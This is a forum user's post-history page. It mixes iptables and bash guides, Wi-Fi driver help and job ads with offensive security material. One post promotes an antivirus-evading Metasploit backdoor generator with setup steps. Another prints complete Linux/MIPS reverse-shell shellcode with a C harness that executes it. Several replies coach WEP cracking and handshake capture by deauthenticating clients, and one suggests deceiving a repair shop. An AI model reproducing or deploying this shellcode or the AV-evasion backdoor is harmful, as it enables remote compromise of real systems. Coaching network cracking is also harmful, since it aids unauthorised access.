co4ie
Active Members
  • Posts: 638
  • Joined
  • Last visited
  • Days Won: 6

Everything posted by co4ie

  1. Fully Undetectable Backdoor generator for Metasploit
     Security Labs Experts from India launched an automated Anti-Virus and Firewall Bypass Script. It's a modified and stable version made to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation of how it works:
     In order to be able to compile the generated payload we must install the following packages; Mingw32 gcc, which you can install by:
     root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
     After the installation we must move our shell-script - Vanish.sh - to the default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14.
     Note: By default the script generates a Reverse TCP Payload, but you can change it with some modifications in the script [vanish.sh].
     The Virus Scan Report of the Backdoor shows that it's almost undetectable by most of the Antivirus programs.
     Download Link: Click Here [Vanish.sh] Size: 3.3 KB OR Pastebin Version here
     Source
  2. Linux comes with a host based firewall called Netfilter. According to the official project site: This Linux based firewall is controlled by the program called iptables, which handles filtering for IPv4, and ip6tables handles filtering for IPv6. I strongly recommend that you first read our quick tutorial that explains how to configure a host-based firewall called Netfilter (iptables) under CentOS / RHEL / Fedora / Redhat Enterprise Linux. This post lists the most common iptables solutions required by a new Linux user to secure his or her Linux operating system from intruders.

     IPTABLES Rules Example
     Most of the actions listed in this post are written with the assumption that they will be executed by the root user running the bash or any other modern shell. Do not type these commands on a remote system as it will disconnect your access. For demonstration purposes I've used RHEL 6.x, but the following commands should work with any modern Linux distro. This is NOT a tutorial on how to set iptables. See tutorial here. It is a quick cheat sheet to common iptables commands.

     #1: Displaying the Status of Your Firewall
     Type the following command as root:
     # iptables -L -n -v
     Sample outputs:
     Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
      pkts bytes target     prot opt in     out     source               destination

     Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
      pkts bytes target     prot opt in     out     source               destination

     Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
      pkts bytes target     prot opt in     out     source               destination
     The above output indicates that the firewall is not active.
     The following sample shows an active firewall:
     # iptables -L -n -v
     Sample outputs:
     Chain INPUT (policy DROP 0 packets, 0 bytes)
      pkts bytes target     prot opt in     out     source               destination
         0     0 DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0           state INVALID
       394 43586 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
        93 17292 ACCEPT     all  --  br0    *       0.0.0.0/0            0.0.0.0/0
         1   142 ACCEPT     all  --  lo     *       0.0.0.0/0            0.0.0.0/0

     Chain FORWARD (policy DROP 0 packets, 0 bytes)
      pkts bytes target     prot opt in     out     source               destination
         0     0 ACCEPT     all  --  br0    br0     0.0.0.0/0            0.0.0.0/0
         0     0 DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0           state INVALID
         0     0 TCPMSS     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp flags:0x06/0x02 TCPMSS clamp to PMTU
         0     0 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
         0     0 wanin      all  --  vlan2  *       0.0.0.0/0            0.0.0.0/0
         0     0 wanout     all  --  *      vlan2   0.0.0.0/0            0.0.0.0/0
         0     0 ACCEPT     all  --  br0    *       0.0.0.0/0            0.0.0.0/0

     Chain OUTPUT (policy ACCEPT 425 packets, 113K bytes)
      pkts bytes target     prot opt in     out     source               destination

     Chain wanin (1 references)
      pkts bytes target     prot opt in     out     source               destination

     Chain wanout (1 references)
      pkts bytes target     prot opt in     out     source               destination
     Where,
     -L : List rules.
     -v : Display detailed information. This option makes the list command show the interface name, the rule options, and the TOS masks. The packet and byte counters are also listed, with the suffix 'K', 'M' or 'G' for 1000, 1,000,000 and 1,000,000,000 multipliers respectively.
     -n : Display IP address and port in numeric format. Do not use DNS to resolve names. This will speed up listing.

     #1.1: To inspect the firewall with line numbers, enter:
     # iptables -n -L -v --line-numbers
     Sample outputs:
     Chain INPUT (policy DROP)
     num  target     prot opt source               destination
     1    DROP       all  --  0.0.0.0/0            0.0.0.0/0           state INVALID
     2    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
     3    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0
     4    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0

     Chain FORWARD (policy DROP)
     num  target     prot opt source               destination
     1    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0
     2    DROP       all  --  0.0.0.0/0            0.0.0.0/0           state INVALID
     3    TCPMSS     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp flags:0x06/0x02 TCPMSS clamp to PMTU
     4    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
     5    wanin      all  --  0.0.0.0/0            0.0.0.0/0
     6    wanout     all  --  0.0.0.0/0            0.0.0.0/0
     7    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0

     Chain OUTPUT (policy ACCEPT)
     num  target     prot opt source               destination

     Chain wanin (1 references)
     num  target     prot opt source               destination

     Chain wanout (1 references)
     num  target     prot opt source               destination
     You can use line numbers to delete or insert new rules into the firewall.

     #1.2: To display INPUT or OUTPUT chain rules, enter:
     # iptables -L INPUT -n -v
     # iptables -L OUTPUT -n -v --line-numbers

     #2: Stop / Start / Restart the Firewall
     If you are using CentOS / RHEL / Fedora Linux, enter:
     # service iptables stop
     # service iptables start
     # service iptables restart
     You can use the iptables command itself to stop the firewall and delete all rules:
     # iptables -F
     # iptables -X
     # iptables -t nat -F
     # iptables -t nat -X
     # iptables -t mangle -F
     # iptables -t mangle -X
     # iptables -P INPUT ACCEPT
     # iptables -P OUTPUT ACCEPT
     # iptables -P FORWARD ACCEPT
     Where,
     -F : Deleting (flushing) all the rules.
     -X : Delete chain.
     -t table_name : Select table (called nat or mangle) and delete/flush rules.
     -P : Set the default policy (such as DROP, REJECT, or ACCEPT).

     #3: Delete Firewall Rules
     To display line numbers along with other information for existing rules, enter:
     # iptables -L INPUT -n --line-numbers
     # iptables -L OUTPUT -n --line-numbers
     # iptables -L OUTPUT -n --line-numbers | less
     # iptables -L OUTPUT -n --line-numbers | grep 202.54.1.1
     You will get the list of IPs. Look at the number on the left, then use that number to delete it. For example, to delete line number 4, enter:
     # iptables -D INPUT 4
     OR find source IP 202.54.1.1 and delete it from the rules:
     # iptables -D INPUT -s 202.54.1.1 -j DROP
     Where,
     -D : Delete one or more rules from the selected chain

     #4: Insert Firewall Rules
     To insert one or more rules in the selected chain as the given rule number use the following syntax. First find out the line numbers, enter:
     # iptables -L INPUT -n --line-numbers
     Sample outputs:
     Chain INPUT (policy DROP)
     num  target     prot opt source               destination
     1    DROP       all  --  202.54.1.1           0.0.0.0/0
     2    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state NEW,ESTABLISHED
     To insert a rule between 1 and 2, enter:
     # iptables -I INPUT 2 -s 202.54.1.2 -j DROP
     To view the updated rules, enter:
     # iptables -L INPUT -n --line-numbers
     Sample outputs:
     Chain INPUT (policy DROP)
     num  target     prot opt source               destination
     1    DROP       all  --  202.54.1.1           0.0.0.0/0
     2    DROP       all  --  202.54.1.2           0.0.0.0/0
     3    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state NEW,ESTABLISHED

     #5: Save Firewall Rules
     To save firewall rules under CentOS / RHEL / Fedora Linux, enter:
     # service iptables save
     In this example, drop an IP and save the firewall rules:
     # iptables -A INPUT -s 202.5.4.1 -j DROP
     # service iptables save
     For all other distros use the iptables-save command:
     # iptables-save > /root/my.active.firewall.rules
     # cat /root/my.active.firewall.rules

     #6: Restore Firewall Rules
     To restore firewall rules from a file called /root/my.active.firewall.rules, enter:
     # iptables-restore < /root/my.active.firewall.rules
     To restore firewall rules under CentOS / RHEL / Fedora Linux, enter:
     # service iptables restart

     #7: Set the Default Firewall Policies
     To drop all traffic:
     # iptables -P INPUT DROP
     # iptables -P OUTPUT DROP
     # iptables -P FORWARD DROP
     # iptables -L -v -n
     #### you will not be able to connect anywhere as all traffic is dropped ###
     # ping cyberciti.biz
     # wget http://www.kernel.org/pub/linux/kernel/v3.0/testing/linux-3.2-rc5.tar.bz2

     #7.1: Only Block Incoming Traffic
     To drop all incoming / forwarded packets, but allow outgoing traffic, enter:
     # iptables -P INPUT DROP
     # iptables -P FORWARD DROP
     # iptables -P OUTPUT ACCEPT
     # iptables -A INPUT -m state --state NEW,ESTABLISHED -j ACCEPT
     # iptables -L -v -n
     ### *** now ping and wget should work *** ###
     # ping cyberciti.biz
     # wget http://www.kernel.org/pub/linux/kernel/v3.0/testing/linux-3.2-rc5.tar.bz2

     #8: Drop Private Network Address On Public Interface
     Stopping IP spoofing is nothing but blocking the following IPv4 address ranges for private networks on your public interfaces. Packets with non-routable source addresses should be rejected using the following syntax:
     # iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP
     # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

     #8.1: IPv4 Address Ranges For Private Networks (make sure you block them on the public interface)
     10.0.0.0/8 (A)
     172.16.0.0/12 (B)
     192.168.0.0/16 (C)
     224.0.0.0/4 (MULTICAST D)
     240.0.0.0/5 (E)
     127.0.0.0/8 (LOOPBACK)

     #9: Blocking an IP Address (BLOCK IP)
     To block an attacker's ip address called 1.2.3.4, enter:
     # iptables -A INPUT -s 1.2.3.4 -j DROP
     # iptables -A INPUT -s 192.168.0.0/24 -j DROP

     #10: Block Incoming Port Requests (BLOCK PORT)
     To block all service requests on port 80, enter:
     # iptables -A INPUT -p tcp --dport 80 -j DROP
     # iptables -A INPUT -i eth1 -p tcp --dport 80 -j DROP
     To block port 80 only for an ip address 1.2.3.4, enter:
     # iptables -A INPUT -p tcp -s 1.2.3.4 --dport 80 -j DROP
     # iptables -A INPUT -i eth1 -p tcp -s 192.168.1.0/24 --dport 80 -j DROP

     #11: Block Outgoing IP Address
     To block outgoing traffic to a particular host or domain such as cyberciti.biz, enter:
     # host -t a cyberciti.biz
     Sample outputs:
     cyberciti.biz has address 75.126.153.206
     Note down its ip address and type the following to block all outgoing traffic to 75.126.153.206:
     # iptables -A OUTPUT -d 75.126.153.206 -j DROP
     You can use a subnet as follows:
     # iptables -A OUTPUT -d 192.168.1.0/24 -j DROP
     # iptables -A OUTPUT -o eth1 -d 192.168.1.0/24 -j DROP

     #11.1: Example - Block Facebook.com Domain
     First, find out all ip addresses of facebook.com, enter:
     # host -t a www.facebook.com
     Sample outputs:
     www.facebook.com has address 69.171.228.40
     Find the CIDR for 69.171.228.40, enter:
     # whois 69.171.228.40 | grep CIDR
     Sample outputs:
     CIDR: 69.171.224.0/19
     To prevent outgoing access to www.facebook.com, enter:
     # iptables -A OUTPUT -p tcp -d 69.171.224.0/19 -j DROP
     You can also use the domain name, enter:
     # iptables -A OUTPUT -p tcp -d www.facebook.com -j DROP
     # iptables -A OUTPUT -p tcp -d facebook.com -j DROP
     From the iptables man page:

     #12: Log and Drop Packets
     Type the following to log and block IP spoofing on the public interface called eth1:
     # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j LOG --log-prefix "IP_SPOOF A: "
     # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP
     By default everything is logged to the /var/log/messages file.
     # tail -f /var/log/messages
     # grep --color 'IP SPOOF' /var/log/messages

     #13: Log and Drop Packets with Limited Number of Log Entries
     The -m limit module can limit the number of log entries created per time. This is used to prevent flooding your log file. To log and drop spoofing at 5 entries per minute, in bursts of at most 7 entries:
     # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -m limit --limit 5/m --limit-burst 7 -j LOG --log-prefix "IP_SPOOF A: "
     # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

     #14: Drop or Accept Traffic From Mac Address
     Use the following syntax:
     # iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP
     ## *only accept traffic for TCP port # 8080 from mac 00:0F:EA:91:04:07 * ##
     # iptables -A INPUT -p tcp --destination-port 22 -m mac --mac-source 00:0F:EA:91:04:07 -j ACCEPT

     #15: Block or Allow ICMP Ping Request
     Type the following command to block ICMP ping requests:
     # iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
     # iptables -A INPUT -i eth1 -p icmp --icmp-type echo-request -j DROP
     Ping responses can also be limited to certain networks or hosts:
     # iptables -A INPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j ACCEPT
     The following only accepts limited types of ICMP requests:
     ### ** assumed that default INPUT policy set to DROP ** #############
     iptables -A INPUT -p icmp --icmp-type echo-reply -j ACCEPT
     iptables -A INPUT -p icmp --icmp-type destination-unreachable -j ACCEPT
     iptables -A INPUT -p icmp --icmp-type time-exceeded -j ACCEPT
     ## ** allow our server to respond to pings ** ##
     iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT

     #16: Open Range of Ports
     Use the following syntax to open a range of ports:
     iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 7000:7010 -j ACCEPT

     #17: Open Range of IP Addresses
     Use the following syntax to open a range of IP addresses:
     ## only accept connection to tcp port 80 (Apache) if ip is between 192.168.1.100 and 192.168.1.200 ##
     iptables -A INPUT -p tcp --destination-port 80 -m iprange --src-range 192.168.1.100-192.168.1.200 -j ACCEPT
     ## nat example ##
     iptables -t nat -A POSTROUTING -j SNAT --to-source 192.168.1.20-192.168.1.25

     #17: Established Connections and Restarting The Firewall
     When you restart the iptables service it will drop established connections as it unloads modules from the system under RHEL / Fedora / CentOS Linux. Edit /etc/sysconfig/iptables-config and set IPTABLES_MODULES_UNLOAD as follows:
     IPTABLES_MODULES_UNLOAD = no

     #18: Help! Iptables Is Flooding My Server Screen
     Use the crit log level to send messages to a log file instead of the console:
     iptables -A INPUT -s 1.2.3.4 -p tcp --destination-port 80 -j LOG --log-level crit

     #19: Block or Open Common Ports
     The following shows the syntax for opening and closing common TCP and UDP ports. Replace ACCEPT with DROP to block a port:
     ## open port ssh tcp port 22 ##
     iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT
     iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 22 -j ACCEPT
     ## open cups (printing service) udp/tcp port 631 for LAN users ##
     iptables -A INPUT -s 192.168.1.0/24 -p udp -m udp --dport 631 -j ACCEPT
     iptables -A INPUT -s 192.168.1.0/24 -p tcp -m tcp --dport 631 -j ACCEPT
     ## allow time sync via NTP for lan users (open udp port 123) ##
     iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p udp --dport 123 -j ACCEPT
     ## open tcp port 25 (smtp) for all ##
     iptables -A INPUT -m state --state NEW -p tcp --dport 25 -j ACCEPT
     ## open dns server ports for all ##
     iptables -A INPUT -m state --state NEW -p udp --dport 53 -j ACCEPT
     iptables -A INPUT -m state --state NEW -p tcp --dport 53 -j ACCEPT
     ## open http/https (Apache) server port to all ##
     iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT
     iptables -A INPUT -m state --state NEW -p tcp --dport 443 -j ACCEPT
     ## open tcp port 110 (pop3) for all ##
     iptables -A INPUT -m state --state NEW -p tcp --dport 110 -j ACCEPT
     ## open tcp port 143 (imap) for all ##
     iptables -A INPUT -m state --state NEW -p tcp --dport 143 -j ACCEPT
     ## open access to Samba file server for lan users only ##
     iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 137 -j ACCEPT
     iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 138 -j ACCEPT
     iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 139 -j ACCEPT
     iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 445 -j ACCEPT
     ## open access to proxy server for lan users only ##
     iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 3128 -j ACCEPT
     ## open access to mysql server for lan users only ##
     iptables -I INPUT -s 192.168.1.0/24 -p tcp --dport 3306 -j ACCEPT

     #20: Restrict the Number of Parallel Connections To a Server Per Client IP
     You can use the connlimit module to put such restrictions in place. To allow 3 ssh connections per client host, enter:
     # iptables -A INPUT -p tcp --syn --dport 22 -m connlimit --connlimit-above 3 -j REJECT
     Set HTTP requests to 20:
     # iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 24 -j DROP
     Where,
     --connlimit-above 3 : Match if the number of existing connections is above 3.
     --connlimit-mask 24 : Group hosts using the prefix length. For IPv4, this must be a number between (including) 0 and 32.

     #21: HowTO: Use iptables Like a Pro
     For more information about iptables, please see the manual page by typing man iptables from the command line:
     $ man iptables
     You can see the help using the following syntax too:
     # iptables -h
     To see help with specific commands and targets, enter:
     # iptables -j DROP -h

     #21.1: Testing Your Firewall
     To find out whether ports are open or not, enter:
     # netstat -tulpn
     To find out whether tcp port 80 is open or not, enter:
     # netstat -tulpn | grep :80
     If port 80 is not open, start Apache, enter:
     # service httpd start
     Make sure iptables is allowing access to port 80:
     # iptables -L INPUT -v -n | grep 80
     Otherwise open port 80 using iptables for all users:
     # iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT
     # service iptables save
     Use the telnet command to see if the firewall allows connecting to port 80:
     $ telnet www.cyberciti.biz 80
     Sample outputs:
     Trying 75.126.153.206...
     Connected to www.cyberciti.biz.
     Escape character is '^]'.
     ^]
     telnet> quit
     Connection closed.
     You can use nmap to probe your own server using the following syntax:
     $ nmap -sS -p 80 www.cyberciti.biz
     Sample outputs:
     Starting Nmap 5.00 ( http://nmap.org ) at 2011-12-13 13:19 IST
     Interesting ports on www.cyberciti.biz (75.126.153.206):
     PORT   STATE SERVICE
     80/tcp open  http
     Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds
     I also recommend you install and use a sniffer such as tcpdump and ngrep to test your firewall settings.

     Conclusion: This post only lists basic rules for new Linux users. You can create and build more complex rules. This requires a good understanding of TCP/IP, Linux kernel tuning via sysctl.conf, and good knowledge of your own setup. Stay tuned for the next topics: Stateful packet inspection. Using connection tracking helpers. Network address translation. Layer 2 filtering. Firewall testing tools. Dealing with VPNs, DNS, Web, Proxy, and other protocols.
     Source
      • 1
      • Upvote
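The cheat sheet above adds rules one at a time on a live box. As an added example (not part of the original post), the following script assembles the same pieces (default DROP policy, state tracking, bogon drops on the public interface, rate-limited LOG then DROP, connlimit on SSH, per-port ACCEPTs) into one iptables-restore file so the whole policy is loaded atomically. The interface name, LAN CIDR, port lists and the user chain name SPOOF are assumptions of this example.

```sh
#!/bin/sh
# Added example, not from the original post: assemble the cheat sheet's rules
# into one iptables-restore file. Loading it with `iptables-restore < file`
# replaces the ruleset atomically instead of appending rules one by one.
# Assumptions (mine, not the page's): one public interface, one trusted LAN
# CIDR, and a user chain named SPOOF for the anti-spoofing log+drop.

# Source ranges that must never arrive on a public interface: RFC 1918,
# multicast (class D), the reserved class E block and loopback.
BOGONS="10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 224.0.0.0/4 240.0.0.0/4 127.0.0.0/8"

# valid_port PORT -> exit status 0 if PORT is an integer in 1..65535
valid_port() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# build_ruleset PUBLIC_IF LAN_CIDR "PUBLIC_TCP_PORTS" "LAN_ONLY_TCP_PORTS"
# Prints the iptables-restore file to stdout; returns 1 on an invalid port
# before printing anything, so a typo never produces a half-built file.
build_ruleset() {
    pub_if=$1 lan=$2 public_ports=$3 lan_ports=$4
    for p in $public_ports $lan_ports; do
        valid_port "$p" || { echo "invalid port: $p" >&2; return 1; }
    done

    printf '%s\n' '*filter'
    # Default policies as in #7.1: drop inbound and forwarded, allow outbound.
    printf '%s\n' ':INPUT DROP [0:0]' ':FORWARD DROP [0:0]' ':OUTPUT ACCEPT [0:0]'
    printf '%s\n' ':SPOOF - [0:0]'

    printf '%s\n' '-A INPUT -i lo -j ACCEPT'
    printf '%s\n' '-A INPUT -m state --state INVALID -j DROP'

    # #8: bogon sources on the public interface go to the SPOOF chain, checked
    # before the ESTABLISHED shortcut so a spoofed packet never rides a flow.
    for net in $BOGONS; do
        printf '%s\n' "-A INPUT -i $pub_if -s $net -j SPOOF"
    done
    # #13 and #18: log at most 5 entries/min (bursts of 7) at crit level, then drop.
    printf '%s\n' '-A SPOOF -m limit --limit 5/m --limit-burst 7 -j LOG --log-prefix "IP_SPOOF A: " --log-level crit'
    printf '%s\n' '-A SPOOF -j DROP'

    printf '%s\n' '-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT'

    # #15: answer pings, but rate-limited; excess echo-requests hit the DROP policy.
    printf '%s\n' '-A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT'

    # #20: reject a source that already holds 3 SSH connections.
    printf '%s\n' '-A INPUT -p tcp --syn --dport 22 -m connlimit --connlimit-above 3 -j REJECT'

    # #19: new connections to public ports from anywhere, LAN-only ports from the LAN.
    for p in $public_ports; do
        printf '%s\n' "-A INPUT -m state --state NEW -p tcp --dport $p -j ACCEPT"
    done
    for p in $lan_ports; do
        printf '%s\n' "-A INPUT -s $lan -m state --state NEW -p tcp --dport $p -j ACCEPT"
    done
    printf '%s\n' 'COMMIT'
}

# Usage: SSH, HTTP and HTTPS public; Samba and MySQL only from the LAN.
# build_ruleset eth1 192.168.1.0/24 "22 80 443" "445 3306" > /root/my.active.firewall.rules
# Review the file, then load it with: iptables-restore < /root/my.active.firewall.rules
```

Because the OUTPUT policy stays ACCEPT and the file is only loaded after it has been written and reviewed, running this over SSH does not lock you out the way the interactive `-P INPUT DROP` sequence in #7 can.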
  3. Advanced Bash-Scripting Guide
     An in-depth exploration of the art of shell scripting
     By Mendel Cooper
     Table of Contents
     Part 1. Introduction: 1. Shell Programming! 2. Starting Off With a Sha-Bang
     Part 2. Basics: 3. Special Characters 4. Introduction to Variables and Parameters 5. Quoting 6. Exit and Exit Status 7. Tests 8. Operations and Related Topics
     Part 3. Beyond the Basics: 9. Another Look at Variables 10. Manipulating Variables 11. Loops and Branches 12. Command Substitution 13. Arithmetic Expansion 14. Recess Time
     Part 4. Commands: 15. Internal Commands and Builtins 16. External Filters, Programs and Commands 17. System and Administrative Commands
     Part 5. Advanced Topics: 18. Regular Expressions 19. Here Documents 20. I/O Redirection 21. Subshells 22. Restricted Shells 23. Process Substitution 24. Functions 25. Aliases 26. List Constructs 27. Arrays 28. Indirect References 29. /dev and /proc 30. Network Programming 31. Of Zeros and Nulls 32. Debugging 33. Options 34. Gotchas 35. Scripting With Style 36. Miscellany 37. Bash, versions 2, 3, and 4 38. Endnotes (38.1. Author's Note, 38.2. About the Author, 38.3. Where to Go For Help, 38.4. Tools Used to Produce This Book, 38.5. Credits, 38.6. Disclaimer)
     Bibliography
     A. Contributed Scripts; B. Reference Cards; C. A Sed and Awk Micro-Primer (C.1. Sed, C.2. Awk); D. Exit Codes With Special Meanings; E. A Detailed Introduction to I/O and I/O Redirection; F. Command-Line Options (F.1. Standard Command-Line Options, F.2. Bash Command-Line Options); G. Important Files; H. Important System Directories; I. An Introduction to Programmable Completion; J. Localization; K. History Commands; L. Sample .bashrc and .bash_profile Files; M. Converting DOS Batch Files to Shell Scripts; N. Exercises (N.1. Analyzing Scripts, N.2. Writing Scripts); O. Revision History; P. Download and Mirror Sites; Q. To Do List; R. Copyright; S. ASCII Table
     Index
     Download as: PDF HTML
     Source
  4. Most likely it is a sensor that is giving you trouble... when it starts heating up, does the fan spin faster, or at the same speed as at the beginning?
  5. OK... now you can try this:
     apt-get install build-essential
     apt-get install libssl-dev
     and afterwards
     ifconfig wlan0 down
     wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
     tar -xjf ipwraw-ng*
     cd ipwraw-ng
     make
     make install
     make install_ucode
     echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
     This driver supports monitor mode and injection, but I don't know exactly whether it also supports Master... try once more to put it in Master mode... in the hope that it will work (although pretty much everywhere I've read, it doesn't support master mode...):
     ifconfig wlan0 up
     iwconfig wlan0 mode Master -->> OR "Master"
     iwconfig wlan0 channel 6
     iwconfig wlan0 essid Retea -->> OR "Retea"
     iwconfig wlan0 key 11111111 (64 bit encryption) -->> OR iwconfig wlan0 key open (no password)
     If Master Mode works, make a bridge between eth0 and wlan0:
     brctl addbr br0
     ifconfig wlan0 0.0.0.0
     brctl addif br0 wlan0
     ifconfig br0 192.168.1.115 netmask 255.255.255.0 up
     route add -net 192.168.1.0 netmask 255.255.255.0 br0
     route add default gw 192.168.1.1 br0
  6. OK... run the command uname -a and write here what it gives you... you can try updating everything with apt-get dist-upgrade and then try once more! If that doesn't work either, run lspci | grep Wireless and paste it here; maybe we can find a driver that also works in master mode...
  7. If you have a wifi card, the first step would be to check whether it is compatible with the aircrack suite... look up the model you have here! And to keep it simple... go Here, make a CD... boot from it... and then look Here... I can't explain it more simply than that...
  8. BTW... 1: WEP = Wired Equivalent Privacy... 2: "equivalency" refers to equal valences... in chemistry, so it has nothing to do with it!! 3: If (and I'm saying this purely hypothetically) you have a WIFI card that supports monitor mode and injection (in Windows), you can use other tools much more simply... for example Aircrack 4 Windows (so that you don't complicate things with 3 programs...) 4: Even though I appreciate the effort... the tutorial seems completely pointless and overly complicated to me, because it can be done much, much, much more simply with aircrack alone, both in Windows and in Linux (for example BackTrack, which already has everything installed)
  9. Well, to be sure of the handshake, you disconnect that one yourself... it's the simplest method... Thanks for the video!!
  10. Odin doesn't see it if it isn't in download mode... There's not much you can do other than take it in for service... if they ask, you say it suddenly wouldn't turn on anymore, and that's it!!
  11. Thanks a lot!!
  12. Download Link
      • 1
      • Upvote
  13. /*
       * Title: Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
       * Author: rigan - imrigan [sobachka] gmail.com
       */
      #include <stdio.h>

      char sc[] =
          "\x24\x0f\xff\xfd"  // li t7,-3
          "\x01\xe0\x20\x27"  // nor a0,t7,zero
          "\x01\xe0\x28\x27"  // nor a1,t7,zero
          "\x28\x06\xff\xff"  // slti a2,zero,-1
          "\x24\x02\x10\x57"  // li v0,4183 ( sys_socket )
          "\x01\x01\x01\x0c"  // syscall 0x40404
          "\xaf\xa2\xff\xff"  // sw v0,-1(sp)
          "\x8f\xa4\xff\xff"  // lw a0,-1(sp)
          "\x24\x0f\xff\xfd"  // li t7,-3 ( sa_family = AF_INET )
          "\x01\xe0\x78\x27"  // nor t7,t7,zero
          "\xaf\xaf\xff\xe0"  // sw t7,-32(sp)
          "\x3c\x0e\x7a\x69"  // lui t6,0x7a69 ( sin_port = 0x7a69 )
          "\x35\xce\x7a\x69"  // ori t6,t6,0x7a69
          "\xaf\xae\xff\xe4"  // sw t6,-28(sp)
          /* ==================== You can change ip here ====================== */
          "\x3c\x0d\xc0\xa8"  // lui t5,0xc0a8 ( sin_addr = 0xc0a8 ...
          "\x35\xad\x01\x64"  // ori t5,t5,0x164 ...0164 )
          /* ====================================================================== */
          "\xaf\xad\xff\xe6"  // sw t5,-26(sp)
          "\x23\xa5\xff\xe2"  // addi a1,sp,-30
          "\x24\x0c\xff\xef"  // li t4,-17 ( addrlen = 16 )
          "\x01\x80\x30\x27"  // nor a2,t4,zero
          "\x24\x02\x10\x4a"  // li v0,4170 ( sys_connect )
          "\x01\x01\x01\x0c"  // syscall 0x40404
          "\x24\x0f\xff\xfd"  // li t7,-3
          "\x01\xe0\x28\x27"  // nor a1,t7,zero
          "\x8f\xa4\xff\xff"  // lw a0,-1(sp)
          //dup2_loop:
          "\x24\x02\x0f\xdf"  // li v0,4063 ( sys_dup2 )
          "\x01\x01\x01\x0c"  // syscall 0x40404
          "\x20\xa5\xff\xff"  // addi a1,a1,-1
          "\x24\x01\xff\xff"  // li at,-1
          "\x14\xa1\xff\xfb"  // bne a1,at, dup2_loop
          "\x28\x06\xff\xff"  // slti a2,zero,-1
          "\x3c\x0f\x2f\x2f"  // lui t7,0x2f2f
          "\x35\xef\x62\x69"  // ori t7,t7,0x6269
          "\xaf\xaf\xff\xf4"  // sw t7,-12(sp)
          "\x3c\x0e\x6e\x2f"  // lui t6,0x6e2f
          "\x35\xce\x73\x68"  // ori t6,t6,0x7368
          "\xaf\xae\xff\xf8"  // sw t6,-8(sp)
          "\xaf\xa0\xff\xfc"  // sw zero,-4(sp)
          "\x27\xa4\xff\xf4"  // addiu a0,sp,-12
          "\x28\x05\xff\xff"  // slti a1,zero,-1
          "\x24\x02\x0f\xab"  // li v0,4011 ( sys_execve )
          "\x01\x01\x01\x0c"; // syscall 0x40404

      int main(void)
      {
          void (*s)(void);
          printf("size: %zu\n", sizeof(sc));
          s = (void (*)(void))sc;  // explicit cast: the byte array is run as code
          s();
          return 0;
      }
      Source
  14. Title: Security Project Manager
      Category: Planning
      Job type: Permanent
      Job status: Full Time
      Salary: £92,400.00 - £95,040.00
      Salary per: annum
      Location: England, South East, Hampshire, GOSPORT
      -------------------------------
      Security Project Manager, Gosport, £350 - £360 a day, Must be SC Cleared

      Job title: Trainee IT Security Consultant (Entry Level Opportunity)
      Position type: Full-time
      Job location: Cambridgeshire CB1
      Compensation: £30000 - 30000 Annually, Up to 30,000 DOE
      Company name: Web-recruit
      Job category: Information Technology and Services

      Junior Penetration Tester - Ethical Hacking / Digital Forensics
      Location: Kidderminster
      Salary: £20000 - £25000 per annum
      Job type: Permanent
      Company: Hewett Recruitment
      Contact: Ben Mannion
      Ref: Totaljobs/BMLH/JPAT
      Job ID: 51534275

      Quick Facts About Ethical Hacking Work
      @ cosminel check THIS
  15. and also add a "Wrap tags" button in quick reply pls :D ...
